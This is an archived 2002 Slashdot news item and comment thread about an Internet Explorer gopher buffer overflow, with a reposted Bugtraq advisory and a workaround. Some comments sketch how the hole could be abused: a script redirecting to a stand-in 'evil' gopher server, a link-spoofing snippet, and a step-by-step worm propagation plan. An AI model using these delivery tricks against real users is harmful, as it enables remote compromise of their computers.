Follow Slashdot stories on Twitter

 



Forgot your password?
typodupeerror
Microsoft

Latest IE Hole Lets Gopher Root You 567

Posted by CmdrTaco
from the well-isn't-that-special dept.
rvaniwaa writes "Another hole in internet explorer has been discovered. This hole allows a hacker to root a user's computer whenever the user clicks on a gopher link. All versions of IE are affected and a Microsoft spokesman stated that the company is "moving forward on the investigation with all due speed""
This discussion has been archived. No new comments can be posted.

Latest IE Hole Lets Gopher Root You

Comments Filter:
  • My thoughts: (Score:2, Insightful)

    by FortKnox (169099)
    Written in one of my journal entries [slashdot.org].

    See if this story follows pattern (I think it will).
  • by CaseyB (1105) on Wednesday June 05, 2002 @09:49AM (#3644861)
    Let the "gopher hole" jokes begin.
  • Speaking as a person who used to use gopher quite a bit - how many gopher links are left on the WWW? Three?

    sPh
    • by linderdm (127168) on Wednesday June 05, 2002 @09:53AM (#3644894)
      I agree that there may not be many gopher links that look like gopher links, but what stops the malicious from disquising their gopher links to look like regular hrefs?
      • by kesuki (321456) on Wednesday June 05, 2002 @10:19AM (#3645135) Journal
        nothing... a simple redirect page can force the gopher link to be opened without the user even being asked to click anything. Not to mention javascript. Anything that allows all those pop-up and pop-under ads can just as easily open a gopher link.
      • Exactly.. it wouldn't take long for a page that says <gopher://ut2003demo>Download the UT 2003 demo</a> to nuke a bunch of computers. (Where's the demo anyway, dammit, I'm dying to play!)

        As I pointed out yesterday [slashdot.org], there's more info [solutions.fi] about the bug and it's prevention available from Oy Solutions, who found the exploit.
      • by silicon_synapse (145470) on Wednesday June 05, 2002 @10:20AM (#3645147)
        Why does a user need to click on the link? Why not just use a javascript location.href= or whatever to automatically load the link? It's my understanding that Yahoo Profiles still lets you embed javascript in a picture URL. What's to stop someone from creating an automated attack and then getting chatters to check your profile? The possibilites seem endless.
      • I agree that there may not be many gopher links that look like gopher links, but what stops the malicious from disquising their gopher links to look like regular hrefs?

        Or better yet, auto-forwarding to them. Throw up a hit page for Google to find, and sit back and wait for the hits. Or spam with the address. It isn't like someone who would exploit this is scrupulous or anything.

      • "I agree that there may not be many gopher links that look like gopher links, but what stops the malicious from disquising their gopher links to look like regular hrefs?"

        <a href="gopher://hostile-link" on mouseover status.text="http://www.friendlysite.com" return true>click here!</a>

        Now my javascript is rusty and I have not tried this ... but you get the idea.

    • Of course if all you need to do to take over an IE users computer is run a gopher server and get some hapless schmoe to click on a gopher link you can bet there will be a sudden resurgence in this venerable protocol. I imagine mixing in a link in pornography spam would probably net you quite a few computers. Some of them would almost certainly have useful information.

    • 1. This is all the evidence Jon Katz needs to prove that Gopher is making a comeback and it's hackers like us who are doing it and we will overthrow the digerati and the ??AA and it could only be possible in a post 9/11 world.

      2. Since gopher's used very rarely, if at all anymore, that's probably why MS hadn't bothered to keep the code up to date. /Gs isn't all it's cracked up to be :(
    • by Simon Brooke (45012) <stillyet@googlemail.com> on Wednesday June 05, 2002 @10:06AM (#3645025) Homepage Journal
      Speaking as a person who used to use gopher quite a bit - how many gopher links are left on the WWW? Three?

      That really isn't the point. It would not take many minutes to put up a gopher server with a Win 32 rootkit as content, and then put an innocent but interesting looking link into a web page ('free live world cup scores' would do nicely just now) with an href pointing to that server, and, ideally, one of those annoying JavaScript scrollers in the browser status display to prevent the user from noticing they're about to click a gopher link, and, hey! That's a few more suckers rooted. It will probably go through most firewalls, too.

      If you (or your organisation) still use Internet Explorer, I would treat this as serious. Change your default IE install to have gopher point to a safe machine of your own; block gopher at your firewall; and, ideally, switch to Opera 6, Netscape 6, or Mozilla as your organisation's default browser.

      This isn't going to be the last security hole found in IE.

    • There are over a million Gopher links according to Google [google.com]. Which, I have to admit, is a few orders of magnitude more than what I was expecting.

      Hmm. Now I'm going all nostalgic for Archie, Veronica and WAIS. Well, maybe not WAIS.

    • Youll notice in the article that you dont actually have to have a gopher server running. MSIE just has to connect to the trap [solutions.fi] via a gopher-like URL.
    • This reminds me a joke [breathemail.net] about a sword incompatible with non-certified dragons :-)

      Just because nobody uses something legitimately, it doesn't mean that nobody will use it maliciously.

  • by Fantanicity (583135) on Wednesday June 05, 2002 @09:51AM (#3644872) Journal
    "hostile Gopher site"? Ouch ... I think shall wear kevlar underpants while using IE in future.
  • by jimmu (227057) on Wednesday June 05, 2002 @09:51AM (#3644873) Homepage
    From the article:

    In January, Microsoft Chairman Bill Gates instructed employees to make software security a top priority.

    Yeah, looks like everythings moving full steam ahead on that front.
  • And yet, despite regular reports like this, posters on Slashdot keep asking why anybody who "cares about the web" would bother using a browser other than IE, and suggest that somebody who wants to use another browser (and, heavens, support cross-platfrom and cross-platfrom browsers) is a naive moralistic high-horse-rider who needs to wake up and get with the program.

    With the program doesn't look like a very nice place to get to me....

    -Rob

    • Re:...and yet (Score:2, Insightful)

      by Fantanicity (583135)
      When are the writers of other browsers going to release the documentation proving that the gopher handling code has been security auditted, that sufficient gopher testcases have been built, and that the browser passed all the gopher handling tests?

      The reason there are aren't reports of security holes in gopher code in other browers is that no-one has looked, not that the holes don't exist.
    • **Sigh...** (Score:2, Insightful)

      by TweeKinDaBahx (583007)
      Most of the other browsers have security holes found in them from time to time as well, but most of the kind crackers out there seems to take a diabolical pleasure in focusing on IE (and since it's one of the core technologies of it, Windows...). If people spent as much time trying to break many of the other Browsers out there, I'm sure they would find they're all their own brand of swiss cheese.

      No software is rock solid, even when it's written to be. There's always a european teenager with way too much time on their hands just waiting to turn you Titanium fortress into a window screen...
      • Re:**Sigh...** (Score:3, Insightful)

        by Jeremi (14640)
        No software is rock solid, even when it's written to be


        Perhaps so, but avoiding buffer overflows isn't rocket science. It's a simple matter of bounds checking. There's really no excuse.

  • by Anonymous Coward on Wednesday June 05, 2002 @09:51AM (#3644876)
    "Where do you want to gopher today?"
  • by kafka93 (243640) on Wednesday June 05, 2002 @09:51AM (#3644882)
    "I smell varmint poontang, and the only good varmint poontang is dead varmint poontang, I think."

  • by arson1 (527855) on Wednesday June 05, 2002 @09:53AM (#3644897) Homepage
    Well you can't expect Microsoft to keep up with all these new technologies and formats!
  • Wow... (Score:2, Troll)

    by TweeKinDaBahx (583007)
    ...I can only imagine how someone found this one.

    However dangerous this hole may be, there are a few reasons why it probably won't create an end of the world scenario, most imporatant of these that gopher is absolutly archaic. I personally havn't seen a gopher server since 1996 (at MIT).

    Second, as always, Microsoft will have a patch out fairly quickly, which is more that can be said for mozilla half of the time...

    *Ducks and covers due to flying penguins*
    • Re:Wow... (Score:2, Funny)

      by MrP- (45616)
      Mozilla had the patch out for a while now I guess, as far as I can tell, Mozilla doesn't support Gopher :)... none of the gopher links I just tried work in mozilla.
    • Re:Wow... (Score:5, Insightful)

      by Gerv (15179) <.ten.vreg. .ta. .vreg.> on Wednesday June 05, 2002 @11:16AM (#3645603) Homepage
      most imporatant of these that gopher is absolutly archaic.

      <script>
      document.location.replace("gopher://ev il.gopherser ver.com:7000/buffer_overflow/");
      </script>

      Second, as always, Microsoft will have a patch out fairly quickly, which is more that can be said for mozilla half of the time...

      I'm amazed at how you split one security hole (XMLHTTPRequest) in two to make a "half the time"... :-)

      Incidentally, the patch for XMLHTTPRequest was in nightly builds within 48 hours of the bug report, and in the next milestone within about a week. In contrast, there are currently 17 unpatched holes in IE [jscript.dk]. What was that you were saying about "quickly"?

      Gerv
  • The remedy (Score:5, Informative)

    by sh0rtie (455432) on Wednesday June 05, 2002 @09:54AM (#3644908)
    To protect from potential exploiting, you can temporarily disable the gopher
    protocol like this:

    Go to Tools -> Internet options -> Connections. Click on "LAN settings".
    Check "Use a proxy server for your LAN". Click on "Advanced...".

    Go to the Gopher text field
    and enter "localhost", and "1" in the port field. This will stop Internet
    Explorer from showing and processing any gopher pages.

    this will protect you for now, at least until M$ pull their finger out
    • Or... (Score:2, Insightful)

      by Robber Baron (112304)
      Don't use IE!
      • Re:Or... (Score:3, Insightful)

        "Don't use IE!"

        I wish it was that simple. There are hordes of people out there who have jobs where if they install anything on their work computer they will get in trouble.

        I am one of these people. I have no choice but to use MSIE and Outlook on NT at work.

        I feel so dirty.

        And thus the previous comments [slashdot.org] about blocking gopher are important to many.

        • Re:Or... (Score:4, Funny)

          by SethJohnson (112166) on Wednesday June 05, 2002 @11:02AM (#3645481) Homepage Journal


          I think it is then your responsibility to intentionally fall victim to every IE / Outlook exploit that comes around. Make your suffering public within the company. Demonstrate how your productivity is reduced due to the draconian browser and mail client policies of your company. After repeated episodes of the IT crew re-imaging your machine, perhaps they'll reconsider.
      • What's worse? Saying "Don't use IE!" as a blatant attempt at karma whoring, or that some idiot moderators modded that up.

        Logic check: "Don't use the browser that most websites are designed for!"

        Do you really think I'd be using IE right now if Opera was cutting it?
        • Ah, the ubiquitous inevitibility argument.

          That argument is, of course, bullshit. Use of a modern HTML DTD such as 4.01 strict enforces consistent behavior on the client side. Javascript may still be a problem, but handicapped accessiblity guidelines will require that content be delivered without its use.

          There was a time where I could not browse the web with anything but IE because of the MS incited erosion of HTML standards. But the resurgence of attention to those standards, combined with a significant and growing user population using non IE browsers, have forced most web sites to un-adapt from the defacto Microsoft standard.

          As for Opera specifically, it is the only browser out there which consistently obeys pre- HTML 4.01 strict DTDs. I am a paying user of Opera, and use it on all my GUI systems.

  • by ramdac (302865)
    I don't have a root user...this must mean my M$ machine is perfectly safe!?
  • Stats, anyone? (Score:4, Interesting)

    by DesScorp (410532) <.DesScorp. .at. .Gmail.com.> on Wednesday June 05, 2002 @09:56AM (#3644925) Homepage Journal
    Has anyone ever tried to compile stats on security holes in browsers? What I'd like to see is a comparison of browsers in this case, with each version listed with the various vulnerabilities found? Obviously, IE is going to come out on top here, but I'd be interested to see such a list anyway. I've looked around the SANS site and didn't see anything like that. I'd even settle for a short summary. Something like IE has X amount of holes, Netscape has Y amount of holes, Opera has Z amount, and so on.
    • Re:Stats, anyone? (Score:5, Informative)

      by sh0rtie (455432) on Wednesday June 05, 2002 @10:07AM (#3645026)

      Yep this site specialises in just that
      Here [jscript.dk]

      also George Guninski does some research here
      Here [guninski.com]

      and Mr Malware
      Here [malware.com]
    • Re:Stats, anyone? (Score:2, Interesting)

      by InfiniteVoid (156157)
      There is no way these type of statistics are going to be accurate.

      First, there's the question of what constitutes a security hole. some might say allowing rampant JavaScript popups is a security hole. Others might require that binary code actually be executed on the machine, or that the HD is modified.

      Second, the number of security holes found, in the case of closed-source browsers, is the number of security holes that its company wants to bother telling you about. It's entirely possible that there are hundreds of security holes in IE that MS knows about and hasn't divulged. Maybe they were quietly fixed in previous IE patches. Maybe they're left unfixed so MS can look like it's making speedy repairs when someone finally finds the bug on their own and tells the press. Again, there's no way of knowing how many of the bugs are being reported.

      Finally, the number of security holes found may correlate strongly with how insecure a browser is. But it could also be that said browser is just used more. Or its code is readable, so such bugs can be found. Or it is actively being developed by coders who care about security. Or no one uses the browser and it's insecure as hell but nobody cares.

      Too many variables. Any study on the number of security holes known is only going to tell you one thing: the number of security holes *known*.
  • I think I read about that in one of my CS books....I recall the prof telling us not needing to retain the information.
  • Great! (Score:2, Funny)

    by Ibjr (570729)
    A Gopher has rooted a hole in you! Wow, slashdot stories are funny again!
  • by Radnor (4434) on Wednesday June 05, 2002 @10:03AM (#3644994)
    Here [solutions.fi] is the page from Online Solutions which details the bug, as well as a workaround and a gopher link to test IE's vulnerability.
  • The article says this affects all versions of IE. I wonder if this hole dates all the way back to NCSA Mosaic. It'd be pretty funny if the hole is that old.

    If this is, in fact, a NCSA Mosaic bug, it probably exists in Netscape thru version 4.x as well. I'd be pretty surprised if either company felt the need to alter the gopher code while they were busy fighting over http.
    • The bug has more to do with the idea of having your browser automatically execute binaries retrieved over the net than it does with gopher. I doubt if Netscape ever had the hole.

  • Anyone remember the CHARGEN problem with IE3? Connect to the CharGen port, and IE would read and cache (in memory) until the PC crashed?

    It's fun when MS figures out something new for the Internet...
  • segfault.org is temporarily out of busines or it'll be a good time for an "arcticle" in the lines of "no IE security flaws found this week".

    now seriously, this is getting anoying. since I started to rely on mozilla only (or since I ditched netscape 4.x for good) some 6 months ago I saw only ONE serious security flaw reported on it and it was corected in a week or so. but with IE we have at least 2 anoucements a month. this is getting so frequent I'm here asking /. to only publish news about IE when the head line is someting in the lines of the segfault.org's style headline above. It'd save a lot in terms of my patience and bandwidht.
  • The last gopher server I used to visit regularly shut down something like three years ago. As far as I know -- no, I haven't checked -- there are no active gopher servers anymore.

    And Microsoft is just getting around to hunting down security holes *now*? What does this say about more current protocols?

    I predict that by 2005, they'll start looking for holes in SOAP )

  • Sandy: "I want you to kill all the gophers on this course."

    Spackler: "Check me if I'm wrong Sandy, but if I kill all the golfers, they'll lock me up and throw away the key."

    Sandy: "The GOPHERS, man! Kill all the GOPHERS!"
  • Keep the burglars out of your house with the new Microsoft Door. Complete with not dead-bolts, but tape, yes TAPE to keep it locked. Also, we've reached an all new level of user friendliness with the omission of door-knobs!!!
  • ...anybody clicked on a gopher link?

    If there isn't a patch yet, or if MSFT says you gotta have IE6 or something, easiest thing to do is just block gopher. What is the gopher port anyway?

    • gopher is 70/tcp according to assigned numbers, but all the gopher links I still see around (I know of three or four - not joking) run on non-standard ports.

      One fun thing is that our directory services only have a gopher interface and don't have an http interface. This means I publish my email address, postal address and telephone number using gopher. This is great because the spambots don't do crawl gopher, so I get zero spam, but most people using a web browser can still view my contact information.

  • by PunchMonkey (261983) on Wednesday June 05, 2002 @10:10AM (#3645055) Homepage
    The Official Bugtraq Post:

    OVERVIEW
    ========

    Gopher is a protocol developed at the University of Minnesota in the
    early 1990's. Gopher servers offer hierarchically organized directories
    and files. These form a "gopherspace" which can be thought of as the
    predecessor of the World Wide Web. Gopher was mostly abandoned soon after
    HTTP and the World Wide Web started gaining popularity.

    Microsoft Internet Explorer has a built-in gopher client. Gopher pages can
    be accessed via URLs starting with "gopher://". The part of code in IE
    which parses gopher replies contains an exploitable buffer overflow
    bug. A malicious server may be used to run arbitrary code on an IE user's
    system.

    DETAILS
    =======

    When the overflow is triggered, a fixed sized buffer in stack gets
    overwritten with data from the gopher server. This data can contain most
    octets from 0 to 255 (also nulls) which makes it particularly easy to
    inject a working shellcode in it. This is a traditional, trivially
    exploitable buffer overflow. A test exploit has been successfully used to
    run arbitrary code without user intervention with various IE versions and
    systems including IE 5.5 and 6.0.

    The attack can be launched via a web page or an HTML mail message which
    redirect the user to a malicious gopher server when the victim views them.
    The server can be very minimal, ie. a program that can listen on a TCP
    port and write a block of data; a fully operational gopher server isn't
    necessary in order to carry out the attack.

    The exploiter could do anything that a regular user could do on the
    system: retrieve, install, or remove files, upload and run programs, etc.

    Full technical details aren't disclosed at this time to prevent
    exploitation.

    WORKAROUND
    ==========

    Internet Explorer users can protect themselves from the flaw by disabling
    the gopher protocol. Barely any gopher servers exist on the Internet
    today, so this is unlikely to cause problems. If needed, a gopher client
    or some other web browser can be used to access the gopherspace.

    An easy way to disable processing and displaying gopher pages is to define
    a non-functional gopher proxy in Internet Options. Select Tools ->
    Internet options -> Connections. Click on "LAN settings". Check "Use a
    proxy server for your LAN". Click on "Advanced...". Here you can define
    proxy servers to be used with different protocols. Go to the Gopher text
    field and enter "localhost", and "1" in the port text field. This will
    stop Internet Explorer from fetching any gopher documents.

    After installing the patch from Microsoft you can remove these gopher
    proxy settings (or restore them to values they had before).

    For more information and a vulnerability test see
    http://www.solutions.fi

    VENDOR STATUS
    =============

    Microsoft was contacted on May 20th. At the moment of writing this
    advisory, Microsoft has started designing and coding a fix, but hasn't
    given any approximation of when it would be released. The patch will be
    available at

    http://www.microsoft.com/technet/security/current. asp

    when it is completed.
  • Is there a workaround for this? Probably not. I don't think any of the major browsers have a way to selecivly disable browser features. It would be nice if you could disable gopher: hyperlinks until this got fixed.

    A nice browser feature would be a regular expression based prefilter of web pages. If a file called prefilter.rules exists, the browser would run the raw html of each pages it downloaded through the filter. This would allow admins to make the browser safe again (with some lost functionality) until the browser was patched.

    In this case you might want to use a rule something like:
    s/(gofer\:[^'" \n\r\t]*)/about:blocked.html?$1/

    I should see if this is a requested feature for mozilla yet. With browsers knowing about regexp for javascript this probably wouldn't be too hard to implement. Plus once it was implemented, you could use it for blocking ads and other annoyances.

  • What about the MacOS 9 and MacOS X version of Internet Explorer? Generally when the press says there is an IE security issue, it doesn't effect us but I could not gleam that info from the short! Yahoo! article!

    Microsoft is so good at screwing up its own OS, thank God they seem to do a good job with Mac apps (though 90% of our security problems are due to M$).This will be moot for Mac Users anyway with Chimera [mozdev.org] looking better every day (nightly build).

  • For those of you who don't know what gopher is or where it's being used, here is a little info and some links to projects and sites related to this good old protocol.

    About gopher:
    Gopher is an infoserver which can deliver text, graphics, audio, and
    multimedia to clients. Keeping documents "link clean", making linking a
    function of the server info-tree and not in the doc, layout is kept to
    its most frugal minimum, and is standard across all docs. No graphic
    design means its the ideal navigable interface, a hypertext Eden. It
    gives simplified usage for sight-impaired users, same contents for
    wired/wiredless, and requires no capital investments in layout and
    "design". Gopher is real -- and it was fully functional in 1992, even
    without advertisements!
    Taken from the gopher manifesto [scn.org]

    Google's Gopher stuff [google.com]
    Yahoo's Gopher stuff [yahoo.com]

    For those that want to go gopher hunting. Here's a link [umn.edu] to a gopher server at the University of MN. I don't think they will install BackOrifice or something, but user beware!

    I wonder how secure a gopher server is?
  • Active gopher sites. (Score:5, Interesting)

    by AJWM (19027) on Wednesday June 05, 2002 @10:15AM (#3645095) Homepage
    The last time I actually used a gopher site was about a year ago, some wire service was running it for its news stories.

    However, a quicky search turns up several still-active gophers, for example:
    gopher://gopher.umsl.edu/ [umsl.edu]
    gopher://gopher.cac.psu.edu/ [psu.edu]
    (These actually return data -- some others I found the server up but no data returned).

    As to why gopher died out, Tim Berners-Lee offers the following:

    "It was just about this time, spring 1993, that the University of Minnesota decided that it would ask for a license fee from certain classes of users who wanted to use gopher. Since the gopher software being picked up so widely, the university was going to charge an annual fee. The browser, and the act of browsing, would be free, and the server software would remain free to nonprofit and educational institutions. But any other users, notably companies, would have to pay to use gopher server software.

    "This was an act of treason in the academic community and the Internet community. Even if the university never charged anyone a dime, the fact that the school had announced it was reserving the right to charge people for the use of the gopher protocols meant it had crossed the line. To use the technology was too risky. Industry dropped gopher like a hot potato."

    (from his book, Weaving the Web)

    • "To use the technology was too risky. Industry dropped gopher like a hot potato."

      Tim is certainly right that this was a factor, however the MN policy change came after HTTP had passed gopher in terms of usage (as measured on the NSF backbone).

      The Web was winning largely because Gopher had a very puritanical outlook. They wanted to hold the net back in the era of VT100 terminals, fixed width fonts and the only formatting being normal, bold and inverse font.

      Another problem was that they really had their heads up their asses when it came to URLs. Their idea of muiltimedia content was that a file could be a text file or a picture. The idea of pictures in the text was anathema.

      Now there have been claims made by the Netscape FUD dept. that there was also opposition to images in the Web community. Actually nothing could be further from the truth. There were a lot of complaints about the botched design of the IMG tag. To be fair to Marc he did give the world 8 hours to comment on his proposal, two of which were actually business hours in Europe (none of which were business hours in the US however).

      By the time the university tried to cash in gopher was already on a downturn. The university action was simply the coup de grace. If it had come when gopher was more popular someone would have forked the source tree or developed an open version.

      Today a lot of the 'gopher' servers are actually Web servers that have the ability to serve multiple protocols.

  • by JohnDenver (246743) on Wednesday June 05, 2002 @10:16AM (#3645102) Homepage
    Obligitory reference to story posted earlier today...
    'Think Tank' Issues Microsoft-Funded Troll [slashdot.org]

    According to this ZDNet article, a Washington think tank known as the Alexis de Tocqueville Institution is soon to release a study stating that Open Source Software allows terrorists an easy time hacking into our systems. It's little suprise that this group takes money from Microsoft." The Register's story is good too. All the whoring reports in the world won't make open source any less secure.

    Everybody knows terrorists love to target Mozilla users by sending them links which causes there system to email Star Office attachments to everybody with payloads that will delete all your OGGs and PNGs by exploiting security holes in Sendmail.

  • here [solutions.fi].

    Well, sort of, anyway. They don't go into much detail because of fear of people exploiting it, but it's some kind of buffer overflow (big surprise there) triggered by a malicious Gopher server.

  • BugTraq (Score:2, Informative)

    by kylus (149953)
    Here is another article [securityfocus.com] from SecurityFocus about the issue, along with the original post [securityfocus.com] to the BugTraq mailing list about this problem.
  • Since When (Score:3, Funny)

    by quantaman (517394) on Wednesday June 05, 2002 @10:25AM (#3645191)
    A Microsoft spokesman who refused to be identified said Tuesday that the company is "moving forward on the investigation with all due speed" and will take the action that best serves its customers.

    Since when did M$ start offering downloads of Mozilla?
  • As you can imagine, "the gopher hole" was a project microshaft envisioned early-on. They couldn't let this go public until they had something to catch the little beasts with. Fortunately now they can catch the gophers with microshaft's giant .net.
  • ... this is why I'm still using Lynx [browser.org]. I'll maybe give one of these new fangled "GUI port 80 telnet clients" a whiz once they're robust enough to deal with ten year old technology.
  • The possibility of this being a Mosaic hole reminds me of one of life's fun little ironies:

    Marc Andreessen wrote Mosaic while at the University of Illinois. After he went on to found Netscape, Microsoft came to an agreement with the University of Illinois to license the Mosaic source code to use it as the core of the Internet Explorer browser. The fact that they still license it is referenced in IE's "About Box". Now the UofI's intellectual property policy is that the creators of the property get ~40% of the licensing money. So, the odds are pretty good that Marc gets annual checks of Microsoft money to pay for his old source code, which was used to destroy his beloved company. Makes me feel bad for him.

    Still, it is kind of funny that Microsoft ends up paying some miniscule part of my University salary because they've never been able to write a web browser from scratch.
  • How long till this is put in a javascript / html email exploit???

    Why do we need anything but text in email? I could even live with a subset of html that would display graphics, but full html???

    scary....
  • by Hiro Antagonist (310179) on Wednesday June 05, 2002 @10:41AM (#3645300) Journal
    Microsoft: Now with more exploited holes than a two-dollar hooker.
  • by drew_kime (303965) on Wednesday June 05, 2002 @10:46AM (#3645339) Homepage Journal
    A Microsoft spokesman
    who refused to be identified said Tuesday ...

    And just why should we trust anything this guy says? Their official spokesman won't even stand by what he's saying. And what is he saying, anyway?

    Refusing to confirm the security flaw, the Microsoft spokesman said the company "feel(s) strongly that speculating on the issue while the investigation is in progress would be irresponsible and counterproductive to our goal of protecting our customers' information."

    And the spokesman added, "Responsible security researchers work with the vendor of a suspected vulnerability issue to ensure that countermeasures are developed before the issue is made public and customers are needlessly put at risk."

    So again, as far as Microsoft is concerned, it's the fault of the people who publicized it. It's prudent to assume these guys are not the only ones who know about the problem. Which means my information is already at risk.

    So if there are people out there who can compromise my system, why shouldn't I be able to find out about it and take preventive measures? Why should I have to wait until Microsoft -- who haven't even admitted to the vulnerability yet, two weeks after being told about it -- get around to fixing it?

    • And just why should we trust anything this guy says? Their official spokesman won't even stand by what he's saying. And what is he saying, anyway?

      His identity is being protected through obscurity. If he open-sourced his name, his job/email account/etc would be open to attack.

      So again, as far as Microsoft is concerned, it's the fault of the people who publicized it. It's prudent to assume these guys are not the only ones who know about the problem. Which means my information is already at risk.

      Your information has been at risk ever since installing your operating system. You agreed to the EULA upon installing it, and that paper holds you responsible for data sharing, you agreed to not hold Microsoft responsible for data loss, intrusion, etc. Also what concerns me is that you claim that other people know about the problem. That is unlikely, as the EULA also forbids reverse-engineering the code to find exploits.

      Additionally, you have the DMCA to protect you, which means that if anyone tries to circumvent the data safeguards on your system, they will be prosecuted.

      I think you are being overly paranoid.

      -fc
  • by kryzx (178628) on Wednesday June 05, 2002 @10:47AM (#3645347) Homepage Journal
    It is really easy to fix this problem with this script I wrote. Just click on the link below to get it.

    gopher://gopher.URr00t3d.ru [theonion.com]

  • by dpbsmith (263124) on Wednesday June 05, 2002 @11:08AM (#3645525) Homepage
    ...why do they have to find and fix them one by one? Can't they switch to a programming language, or debugging tool, or run-time library, that would find and fix all of them?

    Indeed, about the time Windows 2000 was released with 65536 known bugs (or whatever the exact number was), didn't Jim Allchin say that they had such a tool and were using it?

    Should buffer overflows be as outdated as Gopher itself?
  • by joshv (13017) on Wednesday June 05, 2002 @11:22AM (#3645645)
    Everyone keeps saying "but there are like three gopher servers left out there". This is not the point. Any buffer overflow in the IE client code which is exploitable is a huge problem. It doesn't matter that there are damned few servers left that use the exploitable protocol. A malacious server need not even be a fully functioning gopher server, it just needs to listen for requests on the right port and respond appropriately. A worm'ed IIS server could fit the bill quite nicely.

    A smart worm could:
    1. Infect an IIS server via some unfixed hole, or backdoor left by another worm.
    2. Open up a dummy gopher port which responds to all requests with the exploit.
    3. Replace links on the web site the IIS server serves with links to the gopher server exploit.
    4. The worm installs itself on all client machines that click the gopher links and begins scanning for vunerable servers.
    5. Goto 1.

    None of this has anything to do with the number gopher servers left on the Internet.

    -josh

  • by CMiYC (6473) on Wednesday June 05, 2002 @11:40AM (#3645775) Homepage
    I found it humorous that in the "Special Offers" Box there was a ad/link that read: "Access Your PC from Anywhere - Free Download"
  • by kraf (450958) on Wednesday June 05, 2002 @11:45AM (#3645804)
    They don't care.

    Yeah, they made some PR stunts concerning security, but until stuff like this starts affecting their bottom line, they won't care.
    There are just too many morons out there buying their stuff, so the situation won't change anytime soon.

    And don't give me that crap about being forced into using it. Noone is going to hold a gun against your head and say: use explorer or die.
    If your employer makes you use stuff you hate, then you're just a lame pushover and you deserve what you get.
  • by Entropy_ah (19070) on Wednesday June 05, 2002 @12:04PM (#3645986) Homepage Journal
    Click here [mozilla.org] to download it.
  • by surprise_audit (575743) on Wednesday June 05, 2002 @04:03PM (#3648300)
    Anyone consider the possibility that it may be policy at Micro$oft to allow such holes in the software?

    Considering that the browser components are supposedly scattered through many DLLs, any patches from M$ could easily include updates for Digital Rights Management lockdown, spyware to tell tales, etc, as well as the 'next big hole' that someone will 'discover' whenever MS feels the need to send out more tracking/spying/crippling patches.

    Heck, they don't even need to include such stuff, just track who downloads the latest patch and correlate with previous data to build a picture of what's out there.

    For example, say ten million distinct folks download the latest patch for Win98. If M$ *know* they've only sold eight million copies of Win98, they know there are 2 million BSA targets out there...

I have never seen anything fill up a vacuum so fast and still suck. -- Rob Pike, on X.

Working...